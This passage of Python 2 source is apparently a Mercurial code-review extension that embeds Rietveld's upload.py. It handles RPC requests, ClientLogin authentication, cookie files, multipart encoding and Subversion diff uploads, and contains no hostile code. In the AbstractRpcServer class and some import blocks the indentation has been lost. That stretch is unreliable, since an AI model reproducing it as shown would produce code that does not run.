		request_path: The path to send the request to, eg /api/appversion/create.
		payload: The body of the request, or None to send an empty request.
		content_type: The Content-Type header to use.
		timeout: timeout in seconds; default None i.e. no timeout.
			(Note: for large requests on OS X, the timeout doesn't work right.)
		kwargs: Any keyword arguments are converted into query string parameters.
	Returns:
		The response body, as a string.
	"""
	# TODO: Don't require authentication. Let the server say
	# whether it is necessary.
	global rpc
	if rpc == None:
		# Lazily create the shared RPC server object on first use.
		rpc = GetRpcServer(upload_options)
	self = rpc
	if not self.authenticated and force_auth:
		self._Authenticate()
	if request_path is None:
		# Authentication-only call (used by code_login).
		return
	old_timeout = socket.getdefaulttimeout()
	socket.setdefaulttimeout(timeout)
	try:
		tries = 0
		while True:
			tries += 1
			args = dict(kwargs)
			url = "http://%s%s" % (self.host, request_path)
			if args:
				url += "?" + urllib.urlencode(args)
			req = self._CreateRequest(url=url, data=payload)
			req.add_header("Content-Type", content_type)
			try:
				f = self.opener.open(req)
				response = f.read()
				f.close()
				return response
			except urllib2.HTTPError, e:
				if tries > 3:
					raise
				elif e.code == 401:
					self._Authenticate()
				elif e.code == 302:
					# Only a redirect to the Google accounts ServiceLogin
					# page triggers re-authentication; any other redirect
					# is treated as an empty response.
					loc = e.info()["location"]
					if not loc.startswith('https://www.google.com/a') or loc.find('/ServiceLogin') < 0:
						return ''
					self._Authenticate()
				else:
					raise
	finally:
		socket.setdefaulttimeout(old_timeout)
def GetForm(url):
	"""Fetch url and return its form fields as a dict (CRLF normalized to LF)."""
	f = FormParser()
	f.feed(MySend(url))
	f.close()
	for k,v in f.map.items():
		f.map[k] = v.replace("\r\n", "\n");
	return f.map
# Fetch the settings for the CL, like reviewer and CC list, by
# scraping the Rietveld editing forms.
def GetSettings(issue):
	"""Return the issue's form fields (reviewers, cc, description) as a dict."""
	# The /issue/edit page has everything but only the
	# CL owner is allowed to fetch it (and submit it).
	f = None
	try:
		f = GetForm("/" + issue + "/edit")
	except:
		pass
	if not f or 'reviewers' not in f:
		# Maybe we're not the CL owner. Fall back to the
		# /publish page, which has the reviewer and CC lists,
		# and then fetch the description separately.
		f = GetForm("/" + issue + "/publish")
		f['description'] = MySend("/"+issue+"/description", force_auth=False)
	return f
def CreateIssue(subject, desc):
	"""Create a new Rietveld issue with a placeholder diff; exits on failure."""
	form_fields = [
		("content_upload", "1"),
		# ("user", upload_options.email),
		("reviewers", ''),
		("cc", ''),
		("description", desc),
		("base_hashes", ""),
		("subject", subject),
	]
	uploaded_diff_file = [
		("data", "data.diff", emptydiff),
	]
	ctype, body = EncodeMultipartFormData(form_fields, uploaded_diff_file)
	response = MySend("/upload", body, content_type=ctype)
	if response != "":
		# A non-empty response body indicates an error from the server.
		print >>sys.stderr, "Error creating issue:\n" + response
		sys.exit(2)
def EditDesc(issue, subject=None, desc=None, reviewers=None, cc=None, closed=None):
	"""Update fields of an existing issue via its /edit form; exits on failure.

	Only the fields passed as non-None are changed; the rest are
	round-tripped from the fetched form.
	"""
	form_fields = GetForm("/" + issue + "/edit")
	if subject is not None:
		form_fields['subject'] = subject
	if desc is not None:
		form_fields['description'] = desc
	if reviewers is not None:
		form_fields['reviewers'] = reviewers
	if cc is not None:
		form_fields['cc'] = cc
	if closed is not None:
		form_fields['closed'] = closed
	ctype, body = EncodeMultipartFormData(form_fields.items(), [])
	response = MySend("/" + issue + "/edit", body, content_type=ctype)
	if response != "":
		# A non-empty response body indicates an error from the server.
		print >>sys.stderr, "Error editing description:\n" + "Sent form: \n", form_fields, "\n", response
		sys.exit(2)
def PostMessage1(issue, message, reviewers=None, cc=None, send_mail=None, subject=None):
	"""Post a single message to the issue via its /publish form; exits on failure."""
	form_fields = GetForm("/" + issue + "/publish")
	if reviewers is not None:
		form_fields['reviewers'] = reviewers
	if cc is not None:
		form_fields['cc'] = cc
	if send_mail is not None:
		form_fields['send_mail'] = send_mail
	if subject is not None:
		form_fields['subject'] = subject
	form_fields['message'] = message
	# message_only: post a message without changing other issue state.
	form_fields['message_only'] = '1'
	ctype, body = EncodeMultipartFormData(form_fields.items(), [])
	response = MySend("/" + issue + "/publish", body, content_type=ctype)
	if response != "":
		print response
		sys.exit(2)
def PostMessage(ui, issue, message, reviewers=None, cc=None, send_mail=None, subject=None):
	"""Post a message to the Rietveld issue, retrying once on failure.

	When Rietveld is busy, it seems to throw off a lot of HTTP Error 500:
	Internal Server Error.  Rather than abort, sleep and try again.
	Even if the second time fails, let the overall hg command keep going.
	"""
	# Local import: the module's top-level import block is unchanged.
	import time
	try:
		PostMessage1(issue, message, reviewers, cc, send_mail, subject)
		return
	except:
		pass
	ui.warn("error posting to "+server+" log; sleep 2 and try again.")
	# Bug fix: the os module has no sleep(); the original os.sleep(2)
	# raised AttributeError here, defeating the retry.
	time.sleep(2)
	try:
		PostMessage1(issue, message, reviewers, cc, send_mail, subject)
		return
	except:
		pass
	ui.warn("error posting to "+server+" twice; log not updated.")
class opt(object):
	"""Bare attribute holder; RietveldSetup fills an instance in as upload_options."""
	pass
def RietveldSetup(ui, repo):
	"""Initialize module globals (server, upload_options, rpc) from the hg config."""
	global upload_options, rpc, server, server_url_base, force_google_account, verbosity
	# TODO(rsc): If the repository config has no codereview section,
	# do not enable the extension. This allows users to
	# put the extension in their global .hgrc but only
	# enable it for some repositories.
	# if not ui.has_section("codereview"):
	# 	cmdtable = {}
	# 	return
	if not ui.verbose:
		verbosity = 0
	# Config options.
	x = ui.config("codereview", "server")
	if x is not None:
		server = x
	# TODO(rsc): Take from ui.username?
	email = None
	x = ui.config("codereview", "email")
	if x is not None:
		email = x
	cc = None
	x = ui.config("codereview", "cc")
	if x is not None:
		cc = x
	server_url_base = "http://" + server + "/"
	testing = ui.config("codereview", "testing")
	force_google_account = ui.configbool("codereview", "force_google_account", False)
	# Build the options object consumed by the embedded upload.py code.
	upload_options = opt()
	upload_options.email = email
	upload_options.host = None
	upload_options.verbose = 0
	upload_options.description = None
	upload_options.description_file = None
	upload_options.reviewers = None
	upload_options.cc = cc
	upload_options.message = None
	upload_options.issue = None
	upload_options.download_base = False
	upload_options.revision = None
	upload_options.send_mail = False
	upload_options.vcs = None
	upload_options.server = server
	upload_options.save_cookies = True
	if testing:
		upload_options.save_cookies = False
		upload_options.email = "test@example.com"
	# rpc is created lazily by MySend.
	rpc = None
#######################################################################
# We keep a full copy of upload.py here to avoid import path hell.
# It would be nice if hg added the hg repository root
# to the default PYTHONPATH.
# Edit .+2,<hget http://codereview.appspot.com/static/upload.py
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tool for uploading diffs from a version control system to the codereview app.
Usage summary: upload.py [options] [-- diff_options]
Diff options are passed to the diff command of the underlying system.
Supported version control systems:
Git
Mercurial
Subversion
It is important for Git/Mercurial users to specify a tree/node/branch to diff
against by using the '--rev' option.
"""
# This code is derived from appcfg.py in the App Engine SDK (open source),
# and from ASPN recipe #146306.
import cookielib
import getpass
import logging
import mimetypes
import optparse
import os
import re
import socket
import subprocess
import sys
import urllib
import urllib2
import urlparse
# The md5 module was deprecated in Python 2.5.
try:
from hashlib import md5
except ImportError:
from md5 import md5
try:
import readline
except ImportError:
pass
# The logging verbosity:
#  0: Errors only.
#  1: Status messages.
#  2: Info logs.
#  3: Debug logs.
verbosity = 1

# Max size of patch or base file.
MAX_UPLOAD_SIZE = 900 * 1024

# Constants for version control names. Used by GuessVCSName.
VCS_GIT = "Git"
VCS_MERCURIAL = "Mercurial"
VCS_SUBVERSION = "Subversion"
VCS_UNKNOWN = "Unknown"

# whitelist for non-binary filetypes which do not start with "text/"
# .mm (Objective-C) shows up as application/x-freemind on my Linux box.
TEXT_MIMETYPES = ['application/javascript', 'application/x-javascript',
                  'application/x-freemind']

# Maps common VCS abbreviations/spellings to the canonical VCS_* name.
VCS_ABBREVIATIONS = {
  VCS_MERCURIAL.lower(): VCS_MERCURIAL,
  "hg": VCS_MERCURIAL,
  VCS_SUBVERSION.lower(): VCS_SUBVERSION,
  "svn": VCS_SUBVERSION,
  VCS_GIT.lower(): VCS_GIT,
}
def GetEmail(prompt):
  """Prompts the user for their email address and returns it.

  The last used email address is saved to a file and offered up as a suggestion
  to the user. If the user presses enter without typing in anything the last
  used email address is used. If the user enters a new address, it is saved
  for next time we prompt.
  """
  last_email_file_name = os.path.expanduser("~/.last_codereview_email_address")
  last_email = ""
  if os.path.exists(last_email_file_name):
    try:
      last_email_file = open(last_email_file_name, "r")
      last_email = last_email_file.readline().strip("\n")
      last_email_file.close()
      prompt += " [%s]" % last_email
    except IOError, e:
      # Best effort only: an unreadable cache file just means no suggestion.
      pass
  email = raw_input(prompt + ": ").strip()
  if email:
    try:
      last_email_file = open(last_email_file_name, "w")
      last_email_file.write(email)
      last_email_file.close()
    except IOError, e:
      # Failing to persist the address for next time is not fatal.
      pass
  else:
    # Empty input means "accept the suggested last-used address".
    email = last_email
  return email
def StatusUpdate(msg):
  """Print a status message to stdout.

  If 'verbosity' is greater than 0, print the message.

  Args:
    msg: The string to print.
  """
  if verbosity > 0:
    print msg
def ErrorExit(msg):
  """Print an error message to stderr and exit with status 1."""
  print >>sys.stderr, msg
  sys.exit(1)
class ClientLoginError(urllib2.HTTPError):
  """Raised to indicate there was an error authenticating with ClientLogin."""

  def __init__(self, url, code, msg, headers, args):
    urllib2.HTTPError.__init__(self, url, code, msg, headers, None)
    self.args = args
    # ClientLogin reports the failure kind under the "Error" key
    # (e.g. "BadAuthentication", "CaptchaRequired"); _Authenticate switches
    # on this value.
    self.reason = args["Error"]
class AbstractRpcServer(object):
"""Provides a common interface for a simple RPC server."""
def __init__(self, host, auth_function, host_override=None, extra_headers={},
save_cookies=False):
"""Creates a new HttpRpcServer.
Args:
host: The host to send requests to.
auth_function: A function that takes no arguments and returns an
(email, password) tuple when called. Will be called if authentication
is required.
host_override: The host header to send to the server (defaults to host).
extra_headers: A dict of extra headers to append to every request.
save_cookies: If True, save the authentication cookies to local disk.
If False, use an in-memory cookiejar instead. Subclasses must
implement this functionality. Defaults to False.
"""
self.host = host
self.host_override = host_override
self.auth_function = auth_function
self.authenticated = False
self.extra_headers = extra_headers
self.save_cookies = save_cookies
self.opener = self._GetOpener()
if self.host_override:
logging.info("Server: %s; Host: %s", self.host, self.host_override)
else:
logging.info("Server: %s", self.host)
def _GetOpener(self):
"""Returns an OpenerDirector for making HTTP requests.
Returns:
A urllib2.OpenerDirector object.
"""
raise NotImplementedError()
def _CreateRequest(self, url, data=None):
"""Creates a new urllib request."""
logging.debug("Creating request for: '%s' with payload:\n%s", url, data)
req = urllib2.Request(url, data=data)
if self.host_override:
req.add_header("Host", self.host_override)
for key, value in self.extra_headers.iteritems():
req.add_header(key, value)
return req
def _GetAuthToken(self, email, password):
"""Uses ClientLogin to authenticate the user, returning an auth token.
Args:
email: The user's email address
password: The user's password
Raises:
ClientLoginError: If there was an error authenticating with ClientLogin.
HTTPError: If there was some other form of HTTP error.
Returns:
The authentication token returned by ClientLogin.
"""
account_type = "GOOGLE"
if self.host.endswith(".google.com") and not force_google_account:
# Needed for use inside Google.
account_type = "HOSTED"
req = self._CreateRequest(
url="https://www.google.com/accounts/ClientLogin",
data=urllib.urlencode({
"Email": email,
"Passwd": password,
"service": "ah",
"source": "rietveld-codereview-upload",
"accountType": account_type,
}),
)
try:
response = self.opener.open(req)
response_body = response.read()
response_dict = dict(x.split("=")
for x in response_body.split("\n") if x)
return response_dict["Auth"]
except urllib2.HTTPError, e:
if e.code == 403:
body = e.read()
response_dict = dict(x.split("=", 1) for x in body.split("\n") if x)
raise ClientLoginError(req.get_full_url(), e.code, e.msg,
e.headers, response_dict)
else:
raise
def _GetAuthCookie(self, auth_token):
"""Fetches authentication cookies for an authentication token.
Args:
auth_token: The authentication token returned by ClientLogin.
Raises:
HTTPError: If there was an error fetching the authentication cookies.
"""
# This is a dummy value to allow us to identify when we're successful.
continue_location = "http://localhost/"
args = {"continue": continue_location, "auth": auth_token}
req = self._CreateRequest("http://%s/_ah/login?%s" %
(self.host, urllib.urlencode(args)))
try:
response = self.opener.open(req)
except urllib2.HTTPError, e:
response = e
if (response.code != 302 or
response.info()["location"] != continue_location):
raise urllib2.HTTPError(req.get_full_url(), response.code, response.msg,
response.headers, response.fp)
self.authenticated = True
def _Authenticate(self):
"""Authenticates the user.
The authentication process works as follows:
1) We get a username and password from the user
2) We use ClientLogin to obtain an AUTH token for the user
(see http://code.google.com/apis/accounts/AuthForInstalledApps.html).
3) We pass the auth token to /_ah/login on the server to obtain an
authentication cookie. If login was successful, it tries to redirect
us to the URL we provided.
If we attempt to access the upload API without first obtaining an
authentication cookie, it returns a 401 response (or a 302) and
directs us to authenticate ourselves with ClientLogin.
"""
for i in range(3):
credentials = self.auth_function()
try:
auth_token = self._GetAuthToken(credentials[0], credentials[1])
except ClientLoginError, e:
if e.reason == "BadAuthentication":
print >>sys.stderr, "Invalid username or password."
continue
if e.reason == "CaptchaRequired":
print >>sys.stderr, (
"Please go to\n"
"https://www.google.com/accounts/DisplayUnlockCaptcha\n"
"and verify you are a human. Then try again.")
break
if e.reason == "NotVerified":
print >>sys.stderr, "Account not verified."
break
if e.reason == "TermsNotAgreed":
print >>sys.stderr, "User has not agreed to TOS."
break
if e.reason == "AccountDeleted":
print >>sys.stderr, "The user account has been deleted."
break
if e.reason == "AccountDisabled":
print >>sys.stderr, "The user account has been disabled."
break
if e.reason == "ServiceDisabled":
print >>sys.stderr, ("The user's access to the service has been "
"disabled.")
break
if e.reason == "ServiceUnavailable":
print >>sys.stderr, "The service is not available; try again later."
break
raise
self._GetAuthCookie(auth_token)
return
def Send(self, request_path, payload=None,
content_type="application/octet-stream",
timeout=None,
**kwargs):
"""Sends an RPC and returns the response.
Args:
request_path: The path to send the request to, eg /api/appversion/create.
payload: The body of the request, or None to send an empty request.
content_type: The Content-Type header to use.
timeout: timeout in seconds; default None i.e. no timeout.
(Note: for large requests on OS X, the timeout doesn't work right.)
kwargs: Any keyword arguments are converted into query string parameters.
Returns:
The response body, as a string.
"""
# TODO: Don't require authentication. Let the server say
# whether it is necessary.
if not self.authenticated:
self._Authenticate()
old_timeout = socket.getdefaulttimeout()
socket.setdefaulttimeout(timeout)
try:
tries = 0
while True:
tries += 1
args = dict(kwargs)
url = "http://%s%s" % (self.host, request_path)
if args:
url += "?" + urllib.urlencode(args)
req = self._CreateRequest(url=url, data=payload)
req.add_header("Content-Type", content_type)
try:
f = self.opener.open(req)
response = f.read()
f.close()
return response
except urllib2.HTTPError, e:
if tries > 3:
raise
elif e.code == 401 or e.code == 302:
self._Authenticate()
else:
raise
finally:
socket.setdefaulttimeout(old_timeout)
class HttpRpcServer(AbstractRpcServer):
  """Provides a simplified RPC-style interface for HTTP requests."""

  def _Authenticate(self):
    """Save the cookie jar after authentication."""
    super(HttpRpcServer, self)._Authenticate()
    if self.save_cookies:
      StatusUpdate("Saving authentication cookies to %s" % self.cookie_file)
      self.cookie_jar.save()

  def _GetOpener(self):
    """Returns an OpenerDirector that supports cookies and ignores redirects.

    Returns:
      A urllib2.OpenerDirector object.
    """
    opener = urllib2.OpenerDirector()
    opener.add_handler(urllib2.ProxyHandler())
    opener.add_handler(urllib2.UnknownHandler())
    opener.add_handler(urllib2.HTTPHandler())
    opener.add_handler(urllib2.HTTPDefaultErrorHandler())
    opener.add_handler(urllib2.HTTPSHandler())
    opener.add_handler(urllib2.HTTPErrorProcessor())
    if self.save_cookies:
      # NOTE: "server" here is a module-level global from the enclosing
      # extension (one cookie file per review server), not an attribute
      # of this instance.
      self.cookie_file = os.path.expanduser("~/.codereview_upload_cookies_" + server)
      self.cookie_jar = cookielib.MozillaCookieJar(self.cookie_file)
      if os.path.exists(self.cookie_file):
        try:
          self.cookie_jar.load()
          self.authenticated = True
          StatusUpdate("Loaded authentication cookies from %s" %
                       self.cookie_file)
        except (cookielib.LoadError, IOError):
          # Failed to load cookies - just ignore them.
          pass
      else:
        # Create an empty cookie file with mode 600
        fd = os.open(self.cookie_file, os.O_CREAT, 0600)
        os.close(fd)
      # Always chmod the cookie file
      os.chmod(self.cookie_file, 0600)
    else:
      # Don't save cookies across runs of update.py.
      self.cookie_jar = cookielib.CookieJar()
    opener.add_handler(urllib2.HTTPCookieProcessor(self.cookie_jar))
    return opener
# Command-line interface for the embedded upload tool. optparse derives each
# option's dest from its long name when "dest" is omitted (e.g. --issue).
parser = optparse.OptionParser(usage="%prog [options] [-- diff_options]")
parser.add_option("-y", "--assume_yes", action="store_true",
                  dest="assume_yes", default=False,
                  help="Assume that the answer to yes/no questions is 'yes'.")
# Logging
group = parser.add_option_group("Logging options")
group.add_option("-q", "--quiet", action="store_const", const=0,
                 dest="verbose", help="Print errors only.")
group.add_option("-v", "--verbose", action="store_const", const=2,
                 dest="verbose", default=1,
                 help="Print info level logs (default).")
group.add_option("--noisy", action="store_const", const=3,
                 dest="verbose", help="Print all logs.")
# Review server
group = parser.add_option_group("Review server options")
group.add_option("-s", "--server", action="store", dest="server",
                 default="codereview.appspot.com",
                 metavar="SERVER",
                 help=("The server to upload to. The format is host[:port]. "
                       "Defaults to '%default'."))
group.add_option("-e", "--email", action="store", dest="email",
                 metavar="EMAIL", default=None,
                 help="The username to use. Will prompt if omitted.")
group.add_option("-H", "--host", action="store", dest="host",
                 metavar="HOST", default=None,
                 help="Overrides the Host header sent with all RPCs.")
group.add_option("--no_cookies", action="store_false",
                 dest="save_cookies", default=True,
                 help="Do not save authentication cookies to local disk.")
# Issue
group = parser.add_option_group("Issue options")
group.add_option("-d", "--description", action="store", dest="description",
                 metavar="DESCRIPTION", default=None,
                 help="Optional description when creating an issue.")
group.add_option("-f", "--description_file", action="store",
                 dest="description_file", metavar="DESCRIPTION_FILE",
                 default=None,
                 help="Optional path of a file that contains "
                      "the description when creating an issue.")
group.add_option("-r", "--reviewers", action="store", dest="reviewers",
                 metavar="REVIEWERS", default=None,
                 help="Add reviewers (comma separated email addresses).")
group.add_option("--cc", action="store", dest="cc",
                 metavar="CC", default=None,
                 help="Add CC (comma separated email addresses).")
group.add_option("--private", action="store_true", dest="private",
                 default=False,
                 help="Make the issue restricted to reviewers and those CCed")
# Upload options
group = parser.add_option_group("Patch options")
group.add_option("-m", "--message", action="store", dest="message",
                 metavar="MESSAGE", default=None,
                 help="A message to identify the patch. "
                      "Will prompt if omitted.")
group.add_option("-i", "--issue", type="int", action="store",
                 metavar="ISSUE", default=None,
                 help="Issue number to which to add. Defaults to new issue.")
group.add_option("--download_base", action="store_true",
                 dest="download_base", default=False,
                 help="Base files will be downloaded by the server "
                      "(side-by-side diffs may not work on files with CRs).")
group.add_option("--rev", action="store", dest="revision",
                 metavar="REV", default=None,
                 help="Branch/tree/revision to diff against (used by DVCS).")
group.add_option("--send_mail", action="store_true",
                 dest="send_mail", default=False,
                 help="Send notification email to reviewers.")
group.add_option("--vcs", action="store", dest="vcs",
                 metavar="VCS", default=None,
                 help=("Version control system (optional, usually upload.py "
                       "already guesses the right VCS)."))
def GetRpcServer(options):
  """Returns an instance of an AbstractRpcServer.

  Args:
    options: parsed command-line options; server/host/email/save_cookies
      are consulted here.

  Returns:
    A new AbstractRpcServer, on which RPC calls can be made.
  """
  rpc_server_class = HttpRpcServer

  def GetUserCredentials():
    """Prompts the user for a username and password."""
    email = options.email
    if email is None:
      email = GetEmail("Email (login for uploading to %s)" % options.server)
    password = getpass.getpass("Password for %s: " % email)
    return (email, password)

  # If this is the dev_appserver, use fake authentication.
  host = (options.host or options.server).lower()
  if host == "localhost" or host.startswith("localhost:"):
    email = options.email
    if email is None:
      email = "test@example.com"
      logging.info("Using debug user %s.  Override with --email" % email)
    server = rpc_server_class(
        options.server,
        # dev_appserver accepts any password; identity comes from the cookie.
        lambda: (email, "password"),
        host_override=options.host,
        extra_headers={"Cookie":
                       'dev_appserver_login="%s:False"' % email},
        save_cookies=options.save_cookies)
    # Don't try to talk to ClientLogin.
    server.authenticated = True
    return server

  return rpc_server_class(options.server, GetUserCredentials,
                          host_override=options.host,
                          save_cookies=options.save_cookies)
def EncodeMultipartFormData(fields, files):
  """Encode form fields for multipart/form-data.

  Args:
    fields: A sequence of (name, value) elements for regular form fields.
    files: A sequence of (name, filename, value) elements for data to be
           uploaded as files.
  Returns:
    (content_type, body) ready for httplib.HTTP instance.
  Source:
    http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/146306
  """
  BOUNDARY = '-M-A-G-I-C---B-O-U-N-D-A-R-Y-'
  CRLF = '\r\n'
  lines = []
  for (key, value) in fields:
    lines.append('--' + BOUNDARY)
    lines.append('Content-Disposition: form-data; name="%s"' % key)
    lines.append('')
    # The body must be bytes; encode any unicode values as UTF-8.
    if type(value) == unicode:
      value = value.encode("utf-8")
    lines.append(value)
  for (key, filename, value) in files:
    if type(filename) == unicode:
      filename = filename.encode("utf-8")
    if type(value) == unicode:
      value = value.encode("utf-8")
    lines.append('--' + BOUNDARY)
    lines.append('Content-Disposition: form-data; name="%s"; filename="%s"' %
                 (key, filename))
    lines.append('Content-Type: %s' % GetContentType(filename))
    lines.append('')
    lines.append(value)
  # Closing boundary, then a trailing CRLF from joining the final ''.
  lines.append('--' + BOUNDARY + '--')
  lines.append('')
  body = CRLF.join(lines)
  content_type = 'multipart/form-data; boundary=%s' % BOUNDARY
  return content_type, body
def GetContentType(filename):
  """Guess a MIME content-type from a filename's extension.

  Falls back to the generic binary type when the extension is unknown.
  """
  guessed_type, _ = mimetypes.guess_type(filename)
  if guessed_type:
    return guessed_type
  return 'application/octet-stream'
# Use a shell for subcommands on Windows to get a PATH search.
use_shell = sys.platform.startswith("win")
def RunShellWithReturnCode(command, print_output=False,
                           universal_newlines=True,
                           env=os.environ):
  """Executes a command and returns the output from stdout and the return code.

  Args:
    command: Command to execute.
    print_output: If True, the output is printed to stdout.
                  If False, both stdout and stderr are ignored.
    universal_newlines: Use universal_newlines flag (default: True).
    env: Environment mapping for the subprocess (defaults to this process's
         environment).

  Returns:
    Tuple (output, return code)
  """
  logging.info("Running %s", command)
  p = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
                       shell=use_shell, universal_newlines=universal_newlines,
                       env=env)
  if print_output:
    # Stream stdout line by line so the user sees progress as it happens.
    output_array = []
    while True:
      line = p.stdout.readline()
      if not line:
        break
      print line.strip("\n")
      output_array.append(line)
    output = "".join(output_array)
  else:
    output = p.stdout.read()
  p.wait()
  # stderr is read only after the process exits; echo it when streaming.
  errout = p.stderr.read()
  if print_output and errout:
    print >>sys.stderr, errout
  p.stdout.close()
  p.stderr.close()
  return output, p.returncode
def RunShell(command, silent_ok=False, universal_newlines=True,
             print_output=False, env=os.environ):
  """Runs a command, exiting the program if it fails.

  Returns the command's stdout. Exits via ErrorExit when the command
  returns a nonzero status, or when it produced no output and silent_ok
  is false.
  """
  output, status = RunShellWithReturnCode(
      command, print_output, universal_newlines, env)
  if status:
    ErrorExit("Got error status from %s:\n%s" % (command, output))
  if not output and not silent_ok:
    ErrorExit("No output from %s" % command)
  return output
class VersionControlSystem(object):
  """Abstract base class providing an interface to the VCS."""

  def __init__(self, options):
    """Constructor.

    Args:
      options: Command line options.
    """
    self.options = options

  def GenerateDiff(self, args):
    """Return the current diff as a string.

    Args:
      args: Extra arguments to pass to the diff command.
    """
    raise NotImplementedError(
        "abstract method -- subclass %s must override" % self.__class__)

  def GetUnknownFiles(self):
    """Return a list of files unknown to the VCS."""
    raise NotImplementedError(
        "abstract method -- subclass %s must override" % self.__class__)

  def CheckForUnknownFiles(self):
    """Show an "are you sure?" prompt if there are unknown files."""
    unknown_files = self.GetUnknownFiles()
    if unknown_files:
      print "The following files are not added to version control:"
      for line in unknown_files:
        print line
      prompt = "Are you sure to continue?(y/N) "
      answer = raw_input(prompt).strip()
      if answer != "y":
        ErrorExit("User aborted")

  def GetBaseFile(self, filename):
    """Get the content of the upstream version of a file.

    Returns:
      A tuple (base_content, new_content, is_binary, status)
        base_content: The contents of the base file.
        new_content: For text files, this is empty.  For binary files, this is
          the contents of the new file, since the diff output won't contain
          information to reconstruct the current file.
        is_binary: True iff the file is binary.
        status: The status of the file.
    """
    raise NotImplementedError(
        "abstract method -- subclass %s must override" % self.__class__)

  def GetBaseFiles(self, diff):
    """Helper that calls GetBase file for each file in the patch.

    Returns:
      A dictionary that maps from filename to GetBaseFile's tuple.  Filenames
      are retrieved based on lines that start with "Index:" or
      "Property changes on:".
    """
    files = {}
    for line in diff.splitlines(True):
      if line.startswith('Index:') or line.startswith('Property changes on:'):
        unused, filename = line.split(':', 1)
        # On Windows if a file has property changes its filename uses '\'
        # instead of '/'.
        filename = filename.strip().replace('\\', '/')
        files[filename] = self.GetBaseFile(filename)
    return files

  def UploadBaseFiles(self, issue, rpc_server, patch_list, patchset, options,
                      files):
    """Uploads the base files (and if necessary, the current ones as well)."""

    def UploadFile(filename, file_id, content, is_binary, status, is_base):
      """Uploads one file's base or current content to the server."""
      file_too_large = False
      if is_base:
        type = "base"
      else:
        type = "current"
      # Oversized files are registered (so the server knows), but uploaded
      # with empty content.
      if len(content) > MAX_UPLOAD_SIZE:
        print ("Not uploading the %s file for %s because it's too large." %
               (type, filename))
        file_too_large = True
        content = ""
      checksum = md5(content).hexdigest()
      if options.verbose > 0 and not file_too_large:
        print "Uploading %s file for %s" % (type, filename)
      url = "/%d/upload_content/%d/%d" % (int(issue), int(patchset), file_id)
      form_fields = [("filename", filename),
                     ("status", status),
                     ("checksum", checksum),
                     ("is_binary", str(is_binary)),
                     ("is_current", str(not is_base)),
                    ]
      if file_too_large:
        form_fields.append(("file_too_large", "1"))
      if options.email:
        form_fields.append(("user", options.email))
      ctype, body = EncodeMultipartFormData(form_fields,
                                            [("data", filename, content)])
      response_body = rpc_server.Send(url, body,
                                      content_type=ctype)
      if not response_body.startswith("OK"):
        StatusUpdate(" --> %s" % response_body)
        sys.exit(1)

    # Invert patch_list's (file_id_str, filename) pairs into a
    # filename -> file_id_str map; setdefault keeps the first id seen.
    patches = dict()
    [patches.setdefault(v, k) for k, v in patch_list]
    for filename in patches.keys():
      base_content, new_content, is_binary, status = files[filename]
      file_id_str = patches.get(filename)
      # A "nobase" marker in the id means the server doesn't want the base;
      # the numeric id is the suffix after the last underscore.
      if file_id_str.find("nobase") != -1:
        base_content = None
        file_id_str = file_id_str[file_id_str.rfind("_") + 1:]
      file_id = int(file_id_str)
      if base_content != None:
        UploadFile(filename, file_id, base_content, is_binary, status, True)
      if new_content != None:
        UploadFile(filename, file_id, new_content, is_binary, status, False)

  def IsImage(self, filename):
    """Returns true if the filename has an image extension."""
    mimetype = mimetypes.guess_type(filename)[0]
    if not mimetype:
      return False
    return mimetype.startswith("image/")

  def IsBinary(self, filename):
    """Returns true if the guessed mimetype isn't in the text group."""
    mimetype = mimetypes.guess_type(filename)[0]
    if not mimetype:
      return False  # e.g. README, "real" binaries usually have an extension
    # special case for text files which don't start with text/
    if mimetype in TEXT_MIMETYPES:
      return False
    return not mimetype.startswith("text/")
class SubversionVCS(VersionControlSystem):
  """Implementation of the VersionControlSystem interface for Subversion."""

  def __init__(self, options):
    super(SubversionVCS, self).__init__(options)
    if self.options.revision:
      # Accept "REV" or "REV_START:REV_END".
      match = re.match(r"(\d+)(:(\d+))?", self.options.revision)
      if not match:
        ErrorExit("Invalid Subversion revision %s." % self.options.revision)
      self.rev_start = match.group(1)
      self.rev_end = match.group(3)
    else:
      self.rev_start = self.rev_end = None
    # Cache output from "svn list -r REVNO dirname".
    # Keys: dirname, Values: 2-tuple (output for start rev and end rev).
    self.svnls_cache = {}
    # SVN base URL is required to fetch files deleted in an older revision.
    # Result is cached to not guess it over and over again in GetBaseFile().
    required = self.options.download_base or self.options.revision is not None
    self.svn_base = self._GuessBase(required)

  def GuessBase(self, required):
    """Wrapper for _GuessBase; returns the cached base URL."""
    return self.svn_base

  def _GuessBase(self, required):
    """Returns the SVN base URL.

    Args:
      required: If true, exits if the url can't be guessed, otherwise None is
        returned.
    """
    info = RunShell(["svn", "info"])
    for line in info.splitlines():
      words = line.split()
      if len(words) == 2 and words[0] == "URL:":
        url = words[1]
        scheme, netloc, path, params, query, fragment = urlparse.urlparse(url)
        username, netloc = urllib.splituser(netloc)
        if username:
          logging.info("Removed username from base URL")
        # Known hosts get rewritten to their web checkout URLs so the server
        # can fetch base files directly.
        if netloc.endswith("svn.python.org"):
          if netloc == "svn.python.org":
            if path.startswith("/projects/"):
              # Drop the leading "/projects" (9 chars), keeping the slash.
              path = path[9:]
          elif netloc != "pythondev@svn.python.org":
            ErrorExit("Unrecognized Python URL: %s" % url)
          base = "http://svn.python.org/view/*checkout*%s/" % path
          logging.info("Guessed Python base = %s", base)
        elif netloc.endswith("svn.collab.net"):
          if path.startswith("/repos/"):
            # Drop the leading "/repos" (6 chars), keeping the slash.
            path = path[6:]
          base = "http://svn.collab.net/viewvc/*checkout*%s/" % path
          logging.info("Guessed CollabNet base = %s", base)
        elif netloc.endswith(".googlecode.com"):
          path = path + "/"
          base = urlparse.urlunparse(("http", netloc, path, params,
                                      query, fragment))
          logging.info("Guessed Google Code base = %s", base)
        else:
          path = path + "/"
          base = urlparse.urlunparse((scheme, netloc, path, params,
                                      query, fragment))
          logging.info("Guessed base = %s", base)
        return base
    if required:
      ErrorExit("Can't find URL in output from svn info")
    return None

  def GenerateDiff(self, args):
    cmd = ["svn", "diff"]
    if self.options.revision:
